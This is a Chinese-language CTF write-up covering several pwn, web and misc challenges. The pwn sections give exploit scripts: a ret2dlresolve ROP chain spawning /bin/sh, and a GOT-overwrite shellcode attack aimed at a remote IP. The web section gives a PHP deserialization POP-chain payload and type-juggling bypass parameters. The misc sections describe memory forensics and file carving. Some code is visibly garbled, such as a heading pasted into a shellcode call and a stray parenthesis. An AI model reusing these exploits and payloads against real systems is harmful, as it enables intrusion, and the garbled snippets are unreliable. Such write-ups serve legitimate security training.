PWN
PWN no_output
利用strcpy函数’\x00’中止的特性修改read函数从标准输入中读入
通过c中最小负数与-1相除触发signal函数中的栈溢出函数
利用ret2dlresolve获得flag
exp:
from pwn import *
from roputils import *
import time
rop = ROP('./test')
r = process('./test')
bss_base = rop.section('.bss')
context.log_level='debug'
r.send(p32(0))
sleep(1)
r.send("a"*32)
sleep(1)
r.send('hello_boy')
sleep(1)
r.send(str(int(-2147483648)))
sleep(1)
r.send(str(int(-1)))
sleep(1)
buf = rop.fill(77)
buf += rop.call('read', 0, bss_base, 100)
buf += rop.dl_resolve_call(bss_base + 20, bss_base)
r.send(buf)
buf = rop.string('/bin/sh')
buf += rop.fill(20, buf)
buf += rop.dl_resolve_data(bss_base + 20, 'system')
buf += rop.fill(100, buf)
r.send(buf)
r.interactive()
PWN orwfrom pwn import
沙盒,利用add函数覆盖exit函数的got表中的地址为shellcode,再次执行exit函数打印flag值
exp:
#p=process('./pwn')
p = remote("39.105.131.68","12354")
elf=ELF('./pwn')
context(os='linux',arch='amd64')
shellcode = shellcraft.open('/flag')
shellcode += shellcraft.read('rax','rsp',100)
shellcode += shellcraft.write(1,'rsp',100)
p.recv()
p.sendline('1')
p.recvuntil('index:')
p.sendline('-13')
p.recvuntil('size:')
p.sendline('0')
p.recvuntil('content:')
p.sendline(asm(s## 标题hellcode))
p.sendline('5')
p.interactive()
Web
Web 赌徒
御剑扫目录得到www.zip,得到index.php进行代码审计
构造pop链
<?php
class Start
{
public $name='guest';
public $flag='syst3m("cat 127.0.0.1/etc/hint");';
public function __construct()
{
$this->name=new Info();
}
public function _sayhello(){
echo $this->name;
return 'ok';
}
public function __wakeup(){
echo "hi";
$this->_sayhello();
}
public function __get($cc){
echo "give you flag : ".$this->flag;
return ;
}
}
class Info
{
private $phonenumber=123123;
public $promise='I do';
public function __construct(){
$this->file['filename']=new Room();
}
public function __toString(){
return $this->file['filename']->ffiillee['ffiilleennaammee'];
}
}
class Room
{
public $filename='/flag';
public $sth_to_set;
public $a='';
public function __construct()
{
$this->a=$this;
}
public function __get($name){
$function = $this->a;
return $function();
}
public function __invoke(){
$content = $this->Get_hint($this->filename);
echo $content;
}
}
$a=serialize(new Start()));
$b=urlencode($a);
echo $b;
?>
当用get方法传一个pop参数后,会自动调用Show类的_wakeup()魔术方法。new info 当name对象被当作一个字符串被调用时,触发_tostring()方法;$ this->file[‘filename’]=new Room(); 到Room类中,没ffiillee[‘ffiilleennaammee’]属性,触发_get()方法;_get方法中将this->a 当做函数Room,触发_invoke()方法;
执行invoke中的Get_hint由于属性有private,如果直接echo $a 会有一些字符无法打印,因此需要urlencode一下得到:
O%3A5%3A%22Start%22%3A2%3A%7Bs%3A4%3A%22name%22%3BO%3A4%3A%22Info%22%3A3%3A%7Bs%3A17%3A%22%00Info%00phonenumber%22%3Bi%3A123123%3Bs%3A7%3A%22promise%22%3Bs%3A4%3A%22I+do%22%3Bs%3A4%3A%22file%22%3Ba%3A1%3A%7Bs%3A8%3A%22filename%22%3BO%3A4%3A%22Room%22%3A3%3A%7Bs%3A8%3A%22filename%22%3Bs%3A5%3A%22%2Fflag%22%3Bs%3A10%3A%22sth_to_set%22%3BN%3Bs%3A1%3A%22a%22%3Br%3A6%3B%7D%7D%7Ds%3A4%3A%22flag%22%3Bs%3A33%3A%22syst3m%28%22cat+127.0.0.1%2Fetc%2Fhint%22%29%3B%22%3B%7D
传参得到base64编码,解出flag
ZmxhZ3s3NDM2ZjA5ZC1iODcwLTRmMTktYTMyNC1hODY2Nzk3NjZiZGN9
Web 寻宝
key1
第一层:要求不能纯数字,$num1=1234a即可
第二层:利用科学计数法绕过 num2 = 5e6
第三层:要求num3的前七位md5=4bf21cd
第四层:科学计数法绕过
第五层:json字符串为空
post传参得到flag
ppp[number1]=1234a&ppp[number2]=5e6&ppp[number3]=61823470&ppp[number4]=0e00000&ppp[number5]=1[]
key2
得到文件夹中都是word文档,于是用脚本将文档内容全部提取出来
import os
import docx
path = "C:\\Users\\de'l'l\\Desktop\\five_month\\"
path_1 = "5."
path_2 = "VR_"
for i in range(1, 21):
for j in range(1, 21):
fileName = path + path_1 + str(i) + "\\" + path_2 + str(j) + "\\"
logFiles = os.listdir(fileName)
for l in logFiles:
if l.split('.')[-1] == "png":
logFiles.remove(l)
for k in logFiles:
fullFilesDir = fileName + k
fullFilesDir = str(fullFilesDir)
file_content = docx.Document(fullFilesDir)
for p in file_content.paragraphs:
with open("a.txt", "a") as f:
f.write(p.text)
f.write('\n')
Misc
Blueteaming
volatility -f /home/kali/桌面/memory.dmp imageinfo
题目描述:Powershell 脚本由恶意程序执行。包含 power shellscript 内容的注册表项是什么?(而且flag非正常格式)
volatility -f /home/kali/桌面/memory.dmp --profile=Win7SP1x64 dumpregistry --dump-dir=
直到看到:
在Microsoft\Windows\Communication中发现
发现这个恶意命令,以为是flag就交上了, 结果不对
试了试注册表目录不对,然后加上注册表的头,提交成功,
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Communication
EzTime
压缩包解压后得到两个文件,根据提示:找到一个时间属性被程序修改过的文件
$MET用010打开后,发现有关于时间的内容
对比观察两个文件的creationtime内容,发现都一样,继续看时间,发现有不一样的地方
因为flag为非正常格式,提交png格式,{45EF6FFC-F0B6-4000-A7C0-8D1549355A8C}.png
ISO1995
用UltralSO打开文件,发现flag开头的文件名,全部提取出来
发现每个文件放入010中能发现ffff后的两字节内容不一样,全部提取出来
data = '''
...
'''.replace('\n', '').replace(' ', '')
result1 = ''
while(1):
num = data.find('F'*8)
if(num == -1):
break
result1 += data[num+8:num+12]
data = data[num+4:]
提取出来以后按照每四个一组转为10进制,在联想到前面iso中的那些flag开头的文件,只要按照上面的顺序将那些flag文件中的内容对应打印出来即可
result2 = ''
for i in range(0, len(result1), 4):
num = int('0x'+result1[i:i+4], 16)
with open(r'flag_f'+str(num).rjust(5,'0')) as f:
result2 += f.read()
num = result2.find("FLAG")
print(result2[num:])
